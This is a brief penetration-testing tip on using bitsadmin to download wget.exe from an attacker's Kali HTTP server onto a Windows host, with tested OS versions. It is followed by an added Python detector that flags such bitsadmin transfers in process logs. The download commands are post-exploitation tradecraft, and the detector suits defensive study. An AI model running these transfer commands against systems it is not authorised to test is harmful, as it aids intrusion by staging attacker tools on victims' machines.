Use bitsadmin For File Transfer


On Kali:
Set up an HTTP listener someplace where the wget.exe file can be fetched:
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80


On Windows:
Create or change to a directory where your current user has permissions to create files:
mkdir \temp
cd \temp

Get the wget.exe file:
set HOSTIP=10.0.0.22
cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe"



Tested and working on default installs of:
Windows Vista 32 bit
Windows Vista 64 bit
Windows Server 2008 standard SP1 32 bit
Windows 7 SP1 32 bit
Windows 7 SP1 64 bit
Windows 8 32 bit
Windows 8 64 bit
Windows Server 2012 64 bit

This did not work on Windows versions prior to Vista, and it is deprecated and not working on Windows 10.
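
From the defender's side, the transfer above leaves a recognisable process command line. The following is an added example (not part of the original post) that parses bitsadmin /transfer command lines taken from process-creation logs and lists reasons to review them; the sample log lines, function names and extension list are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample command lines, as they might appear in process-creation
# logs (for example Windows event 4688 or Sysmon event 1). Not real telemetry.
SAMPLE_CMDLINES = [
    r'cmd /c "bitsadmin /transfer wcb /priority foreground http://10.0.0.22/wget.exe C:\temp\wget.exe"',
    r'bitsadmin.exe /list /allusers',
    r'BITSADMIN /Transfer upd /download /priority normal https://updates.example.test/pkg.cab C:\ProgramData\pkg.cab',
    r'notepad.exe C:\temp\bitsadmin-notes.txt',
]

# Simplification: tokens are split on whitespace, so quoted paths with spaces are not handled.
TRANSFER_RE = re.compile(r'\bbitsadmin(?:\.exe)?"?\s+/transfer\s+(.*)', re.IGNORECASE)
EXEC_EXT = ('.exe', '.dll', '.ps1', '.bat', '.cmd', '.vbs', '.js', '.hta', '.msi', '.scr')

def parse_transfer(cmdline):
    """Return job name, remote URL and local path of a /transfer job, or None."""
    m = TRANSFER_RE.search(cmdline)
    if not m:
        return None
    tokens = [t.strip('"') for t in m.group(1).split()]
    for i, tok in enumerate(tokens):
        if i > 0 and '://' in tok:  # token 0 is the job name; switches are skipped
            local = tokens[i + 1] if i + 1 < len(tokens) else None
            return {'job': tokens[0], 'url': tok, 'local': local}
    return None

def findings(cmdline):
    """List the reasons a command line deserves a closer look (empty if none)."""
    t = parse_transfer(cmdline)
    if t is None:
        return []
    reasons = ['bitsadmin /transfer from %s' % t['url']]
    u = urlparse(t['url'])
    if u.scheme.lower() == 'http':
        reasons.append('cleartext HTTP source')
    if re.fullmatch(r'\d{1,3}(\.\d{1,3}){3}', u.hostname or ''):
        reasons.append('source is a bare IP address')
    if (t['local'] or '').lower().endswith(EXEC_EXT):
        reasons.append('writes an executable or script file')
    return reasons

if __name__ == '__main__':
    for c in SAMPLE_CMDLINES:
        print(findings(c) or 'no finding', '<-', c)
```

A bitsadmin /transfer on its own can be legitimate administration, so the extra reasons are what raise the priority of a hit.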
